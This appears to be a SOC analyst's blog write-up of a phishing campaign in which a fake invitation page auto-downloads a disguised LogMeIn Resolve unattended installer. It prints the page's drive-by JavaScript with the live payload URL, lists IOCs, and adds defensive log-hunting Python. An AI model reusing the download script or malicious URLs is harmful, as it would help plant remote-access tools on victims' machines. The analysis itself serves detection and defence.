====================
== Alert Overload ==
====================
Tales from a SOC analyst

LogMeIn Unattended Installer

A user received a phishing email that redirected them to hxxps[://]popthecard[.]pages[.]dev. This page claimed that a friend had sent an invitation, and that the user must download and open it on a Windows laptop or desktop to view it. The page automatically downloaded the file VelvetPaperCo.exe (in similar incidents, invitation.exe).

The page itself is rather basic, with the following JavaScript code handling the download. It sets a series of timeouts and, two seconds after load, calls a function that points the browser at a public Cloudflare R2 bucket hosting the malicious RMM installer.

    function relunch(){
        window.location.href = "https://pub-f4f11fdd20cb4fbe961e1dc5fedcb0f6.r2.dev/VelvetPaperCo.exe";
    }
    window.onload = function () {
        const loader = document.getElementById("loaderBar");
        const box = document.getElementById("loaderBox");
        // "counter" is referenced below but is defined elsewhere on the page, outside this captured excerpt.
        setTimeout(() => { counter.innerHTML = "Downloading will start automatically in 2 seconds..."; }, 1000);
        setTimeout(() => {
            counter.innerHTML = "Downloading will start automatically in 1 seconds...";
            relunch();
        }, 2000);
        setTimeout(() => {
            counter.innerHTML = "Downloading your invitation...";
            loader.style.width = "100%";
        }, 3000);
        setTimeout(() => { box.style.display = "none"; }, 5200);
    };

Basic analysis of the downloaded file shows that it is a LogMeIn Resolve unattended installer. These installers can be generated by any GoToResolve customer according to the GoToResolve documentation.

Using an interactive sandbox, logs from the installation of the tool were recovered. These logs include the company ID of the GoToResolve customer that generated these installers.

The installer does check for the presence of certain security solutions and tools during the installation process.

The following are excerpts from several config files used by the installer. Unfortunately, the sandbox used has a 10-minute time limit, which prevented a full capture of the logs.

mandatory.json

If the installer is not given command line arguments, it reads installation options such as the Company ID and Service Name from the mandatory.json file.

pc.json

[screenshot of the pc.json excerpt]

unattended.json

[screenshot of the unattended.json excerpt]

IOCs

IOC                                                                Type         Comment
-----------------------------------------------------------------  -----------  ------------------------------------------
hxxps[://]popthecard[.]pages[.]dev                                 Domain       Malicious phishing domain
hxxps[://]pub-f4f11fdd20cb4fbe961e1dc5fedcb0f6[.]r2[.]dev          Domain       Malicious domain serving the RMM download
721482adaa2480052b127a15cd281328e6fb9120f5cc8d8e156d432f50ab5cce   SHA256 Hash  Hash of the RMM installer
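To turn the table above into something a SOC can run, the following added example (my own code, not from the original post or from LogMeIn/GoTo) refangs the published indicators, matches them against proxy log records, and checks a file hash against the installer's SHA256. The proxy log lines are constructed for the example, the JSON field names (ts, src, host, url, status) are an assumption about the log format, and the hunting function generalizes beyond the specific IOC by flagging any .exe download from a *.r2.dev host, which is how the installer was staged in this incident.

```python
import hashlib
import json
import re
from urllib.parse import urlparse

# Indicators exactly as published in the IOC table above (defanged form).
DEFANGED_IOCS = {
    "hxxps[://]popthecard[.]pages[.]dev": "Malicious phishing domain",
    "hxxps[://]pub-f4f11fdd20cb4fbe961e1dc5fedcb0f6[.]r2[.]dev": "Malicious domain serving the RMM download",
}
INSTALLER_SHA256 = "721482adaa2480052b127a15cd281328e6fb9120f5cc8d8e156d432f50ab5cce"


def refang(ioc: str) -> str:
    """Undo hxxp(s) and [.] / [://] defanging so an indicator compares with real log fields."""
    s = re.sub(r"^hxxp", "http", ioc)
    return s.replace("[://]", "://").replace("[.]", ".").replace("[:]", ":")


def host_of(ioc: str) -> str:
    """Hostname of a (possibly defanged) URL indicator, lower-cased by urlparse."""
    return urlparse(refang(ioc)).hostname


# Lookup table keyed by refanged hostname -> analyst comment.
KNOWN_HOSTS = {host_of(k): v for k, v in DEFANGED_IOCS.items()}

# Constructed sample proxy log (JSON lines). Assumed field names; not from the incident.
SAMPLE_PROXY_LOG = """\
{"ts":"2024-01-01T10:00:01Z","src":"10.0.0.12","host":"popthecard.pages.dev","url":"https://popthecard.pages.dev/invite","status":200}
{"ts":"2024-01-01T10:00:04Z","src":"10.0.0.12","host":"pub-f4f11fdd20cb4fbe961e1dc5fedcb0f6.r2.dev","url":"https://pub-f4f11fdd20cb4fbe961e1dc5fedcb0f6.r2.dev/VelvetPaperCo.exe","status":200}
{"ts":"2024-01-01T10:01:00Z","src":"10.0.0.33","host":"example.com","url":"https://example.com/","status":200}
{"ts":"2024-01-01T10:02:00Z","src":"10.0.0.40","host":"POPTHECARD.PAGES.DEV.","url":"https://POPTHECARD.PAGES.DEV/x","status":200}
"""


def _records(text: str):
    for line in text.splitlines():
        if line.strip():
            yield json.loads(line)


def scan_proxy_log(text: str) -> list:
    """Return one hit per record whose host matches a published indicator (case- and trailing-dot-insensitive)."""
    hits = []
    for rec in _records(text):
        host = rec.get("host", "").lower().rstrip(".")
        if host in KNOWN_HOSTS:
            hits.append({"ts": rec.get("ts"), "src": rec.get("src"), "host": host, "comment": KNOWN_HOSTS[host]})
    return hits


def hunt_public_bucket_exe(text: str) -> list:
    """Hunting heuristic (a generalization of this incident): any .exe fetched from a public *.r2.dev bucket."""
    flagged = []
    for rec in _records(text):
        parsed = urlparse(rec.get("url", ""))
        host = (parsed.hostname or "").rstrip(".")
        if host.endswith(".r2.dev") and parsed.path.lower().endswith(".exe"):
            flagged.append({"ts": rec.get("ts"), "src": rec.get("src"), "url": rec.get("url")})
    return flagged


def is_known_installer(data: bytes) -> bool:
    """True if the file content hashes to the installer SHA256 from the IOC table."""
    return hashlib.sha256(data).hexdigest() == INSTALLER_SHA256


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print("IOC hit:", hit)
    for item in hunt_public_bucket_exe(SAMPLE_PROXY_LOG):
        print("R2 .exe download:", item)
```

Matching on the normalized hostname rather than the full URL is deliberate: the lure path varies between incidents (VelvetPaperCo.exe versus invitation.exe), while the hosting domains are the stable part of the table. The hash check is only useful against a quarantined sample; a renamed or rebuilt installer from the same GoToResolve company would not match it.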